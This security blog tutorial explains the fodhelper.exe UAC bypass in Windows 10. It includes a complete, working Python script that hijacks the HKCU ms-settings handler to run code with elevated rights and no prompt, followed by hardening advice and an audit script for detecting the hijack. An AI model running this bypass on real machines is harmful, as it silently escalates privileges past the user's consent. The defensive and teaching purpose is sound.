How to bypass Windows 10 UAC with Python

In May 2017, a UAC bypass for Windows 10 was published that allows an arbitrary command to be executed with administrator (high integrity) privileges without a UAC prompt ever being shown.

The technique abuses a “trusted binary”, fodhelper.exe, which Windows elevates automatically, and tricks it into launching an attacker-controlled command from its elevated context.

Windows UAC

User Account Control (UAC) is a security component of Windows that lets users perform everyday tasks as a standard user and, only when needed, as an administrator, without switching users, logging off, or using the “Run As” option.

Whenever a user attempts a task that requires administrative rights, the consent prompt is presented.

The fodhelper.exe is a “trusted binary” located under C:\Windows\System32. It runs when a user requests to open “Manage Optional Features” option in the “Apps & features” Windows Settings screen.


The binary’s manifest sets the “autoElevate” flag, it is built and digitally signed by Microsoft, and it lives in a trusted location (C:\Windows\System32). When a member of the local Administrators group runs it and UAC is set below “Always Notify”, Windows elevates it silently: no UAC prompt is shown.

In short, what was found is that fodhelper.exe opens the ms-settings: protocol through the shell, and the shell resolves that protocol’s handler through HKEY_CLASSES_ROOT. HKCR is a merged view of HKLM\Software\Classes and HKCU\Software\Classes in which the per-user hive wins, so fodhelper.exe ends up honouring two values that any standard user can write:

HKCU\Software\Classes\ms-settings\shell\open\command\(default)
HKCU\Software\Classes\ms-settings\shell\open\command\DelegateExecute

The (default) value holds the command line the shell will run; DelegateExecute must exist and be empty, otherwise the shell looks for a COM handler instead of running the command string.

With that in mind, any code already running as the user (no elevation needed) can create those values and have fodhelper.exe launch arbitrary code on the user’s behalf, elevated and without any consent prompt.

Using Python to Bypass the UAC

Let’s start with a simple Python script that checks whether it is running with administrative privileges.

If you’re NOT running the python script as admin, you’ll get the following message:

[!] The script is NOT running with administrative privileges

Now let’s extend the script to perform the bypass and relaunch itself with administrative privileges.

This time, running the script opens a second command prompt, and this one is elevated.

The script wrote the two values under HKCU\Software\Classes\ms-settings\shell\open\command (check regedit) so that the shell executes our script every time fodhelper.exe starts, and then it launched fodhelper.exe. Both values are required: the shell only uses (default) when DelegateExecute is present and empty. The planted key should be deleted again afterwards, otherwise the hijack stays in the user profile and fires on every later launch of fodhelper.exe.
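The complete procedure described above (admin check, planting the two values, launching fodhelper.exe, cleaning up) as one script. This is an added example written for this page, not the code from the original post. It assumes Python 3 on Windows 10, a user who is a member of the local Administrators group, and UAC below “Always Notify”; the `fodhelper_path`, `key_chain` and `plant_handler` helpers are names chosen here, not Windows or Python APIs. The `winreg` import is guarded only so the module can be loaded and its pure functions tested on a non-Windows host.

```python
"""fodhelper.exe UAC bypass in Python (added example, see the lead-in for assumptions)."""
import ctypes
import os
import subprocess
import sys
import time

try:
    import winreg  # Windows only; the guard lets the module import elsewhere
except ImportError:  # pragma: no cover - non-Windows host, registry helpers unusable
    winreg = None

# Per-user protocol handler key. HKCR resolves it before the HKLM copy and a
# standard user can write it, which is the whole point of the technique.
MS_SETTINGS_KEY = r"Software\Classes\ms-settings"
COMMAND_SUBKEY = r"shell\open\command"


def is_admin() -> bool:
    """True when the current process token is elevated (Windows only)."""
    if os.name != "nt":
        return False
    try:
        return bool(ctypes.windll.shell32.IsUserAnAdmin())
    except (AttributeError, OSError):
        return False


def fodhelper_path() -> str:
    """Prefer Sysnative so a 32-bit Python on 64-bit Windows is not redirected to SysWOW64."""
    windir = os.environ.get("SystemRoot", r"C:\Windows")
    sysnative = os.path.join(windir, "Sysnative", "fodhelper.exe")
    if os.path.exists(sysnative):
        return sysnative
    return os.path.join(windir, "System32", "fodhelper.exe")


def build_payload_command(script_path: str, python_exe: str = sys.executable) -> str:
    """Command line stored in (default); quoting keeps paths with spaces intact."""
    return f'"{python_exe}" "{script_path}"'


def key_chain(root: str = MS_SETTINGS_KEY, sub: str = COMMAND_SUBKEY) -> list:
    """Deepest-first list of the keys to delete (RegDeleteKey refuses non-empty keys)."""
    parts = sub.split("\\")
    chain = [root + "\\" + "\\".join(parts[:i]) for i in range(len(parts), 0, -1)]
    chain.append(root)
    return chain


def plant_handler(command: str) -> None:
    """Write the two values the shell consults when fodhelper.exe opens ms-settings:."""
    with winreg.CreateKey(winreg.HKEY_CURRENT_USER, MS_SETTINGS_KEY + "\\" + COMMAND_SUBKEY) as key:
        winreg.SetValueEx(key, None, 0, winreg.REG_SZ, command)          # (default)
        winreg.SetValueEx(key, "DelegateExecute", 0, winreg.REG_SZ, "")  # must exist and be empty


def remove_handler() -> None:
    """Delete the planted keys so the user profile is left as it was found."""
    for path in key_chain():
        try:
            winreg.DeleteKey(winreg.HKEY_CURRENT_USER, path)
        except FileNotFoundError:
            pass


def launch_fodhelper() -> bool:
    """Start fodhelper.exe via ShellExecute so the AppInfo service auto-elevates it.

    CreateProcess (subprocess.Popen) would fail with ERROR_ELEVATION_REQUIRED because
    the manifest requires administrator rights. ShellExecuteW returns > 32 on success.
    """
    sw_shownormal = 1
    return ctypes.windll.shell32.ShellExecuteW(None, "open", fodhelper_path(), None, None, sw_shownormal) > 32


def main() -> None:
    script = os.path.abspath(__file__)
    if is_admin():
        print("[+] The script is running with administrative privileges")
        # Demonstration payload: a new console that inherits the elevated token
        subprocess.Popen(["cmd.exe"], creationflags=subprocess.CREATE_NEW_CONSOLE)
        return
    print("[!] The script is NOT running with administrative privileges")
    plant_handler(build_payload_command(script))
    try:
        if not launch_fodhelper():
            print("[-] ShellExecute on fodhelper.exe failed")
        time.sleep(3)  # let fodhelper read the handler before the key is removed
    finally:
        remove_handler()


if __name__ == "__main__":
    main()
```

The three-second sleep before cleanup is a race, not a guarantee: on a slow host the elevated launch may not have read the key yet, and a crash between `plant_handler` and `remove_handler` leaves the hijack in place, which is exactly the artefact a defender should look for.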

Preventing the Exploitation

To prevent malicious code from being run this way, set the UAC level to “Always Notify”: at that level Windows does not auto-elevate any binary, so fodhelper.exe prompts like everything else. The better fix is for users to stop working day-to-day with an account in the local Administrators group, since the technique only works for such an account (a standard user gets a credential prompt instead of silent elevation). Keep in mind that Microsoft does not treat UAC as a security boundary, so these are hardening measures rather than a patch. On the detection side, a (default) or DelegateExecute value appearing under HKCU\Software\Classes\ms-settings\shell\open\command, especially shortly before fodhelper.exe starts, is a reliable indicator of this bypass.
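An audit script that checks the conditions from this section on a host: whether UAC is enabled, whether it is at “Always Notify” (ConsentPromptBehaviorAdmin = 2 with PromptOnSecureDesktop = 1), and whether a per-user ms-settings handler has been planted. This is an added example, not code from the original post. The registry reads (`collect`) are Windows only; the assessment (`assess`) is pure Python so it can be exercised on constructed state, as in the sample states below, which are made up for the demonstration.

```python
"""Audit UAC level and look for a planted ms-settings handler (added example)."""
import os

try:
    import winreg  # Windows only
except ImportError:  # pragma: no cover - allows the assessment logic to run anywhere
    winreg = None

UAC_POLICY_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
HIJACK_KEY = r"Software\Classes\ms-settings\shell\open\command"


def read_value(hive, path, name):
    """Return a registry value, or None when the key or value is absent (Windows only)."""
    try:
        with winreg.OpenKey(hive, path) as key:
            return winreg.QueryValueEx(key, name)[0]
    except FileNotFoundError:
        return None


def collect() -> dict:
    """Read the live settings (Windows only)."""
    if os.name != "nt" or winreg is None:
        raise RuntimeError("registry collection only works on Windows")
    hklm, hkcu = winreg.HKEY_LOCAL_MACHINE, winreg.HKEY_CURRENT_USER
    return {
        "enable_lua": read_value(hklm, UAC_POLICY_KEY, "EnableLUA"),
        "consent_prompt_behavior_admin": read_value(hklm, UAC_POLICY_KEY, "ConsentPromptBehaviorAdmin"),
        "prompt_on_secure_desktop": read_value(hklm, UAC_POLICY_KEY, "PromptOnSecureDesktop"),
        # "" names the (default) value; None means no per-user handler exists
        "hkcu_ms_settings_command": read_value(hkcu, HIJACK_KEY, ""),
        "hkcu_delegate_execute": read_value(hkcu, HIJACK_KEY, "DelegateExecute"),
    }


def assess(state: dict) -> list:
    """Turn collected (or constructed) state into findings, worst first."""
    findings = []
    if state.get("enable_lua") == 0:
        findings.append("UAC is disabled (EnableLUA=0): every process of an admin user runs elevated")
    # An absent ConsentPromptBehaviorAdmin means the OS default (5), which still auto-elevates.
    always_notify = (state.get("consent_prompt_behavior_admin") == 2
                     and state.get("prompt_on_secure_desktop") == 1)
    if not always_notify and state.get("enable_lua") != 0:
        findings.append("UAC below 'Always Notify': auto-elevating binaries such as fodhelper.exe do not prompt")
    cmd = state.get("hkcu_ms_settings_command")
    if cmd is not None or state.get("hkcu_delegate_execute") is not None:
        findings.append(f"per-user ms-settings handler present in HKCU (possible fodhelper hijack): command={cmd!r}")
    return findings


# Constructed sample states for the demonstration (not taken from a real host).
DEFAULT_WIN10 = {"enable_lua": 1, "consent_prompt_behavior_admin": 5, "prompt_on_secure_desktop": 1,
                 "hkcu_ms_settings_command": None, "hkcu_delegate_execute": None}
HARDENED = {"enable_lua": 1, "consent_prompt_behavior_admin": 2, "prompt_on_secure_desktop": 1,
            "hkcu_ms_settings_command": None, "hkcu_delegate_execute": None}
HIJACKED = dict(DEFAULT_WIN10, hkcu_ms_settings_command='"C:\\Python\\python.exe" "C:\\tmp\\bypass.py"',
                hkcu_delegate_execute="")


if __name__ == "__main__":
    state = collect() if os.name == "nt" else HIJACKED
    for finding in assess(state) or ["no findings"]:
        print(f"[*] {finding}")
```

Run it as the user you are worried about: the HKCU part of the check is per profile, so a handler planted under another account's hive is invisible here and has to be looked for in that user's NTUSER.DAT.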

Süleyman Çelik
Network Security Engineer, SOC-Siem Engineer, Cyber Security Researcher, Vulnerability Management Specialist | CEH | CNSS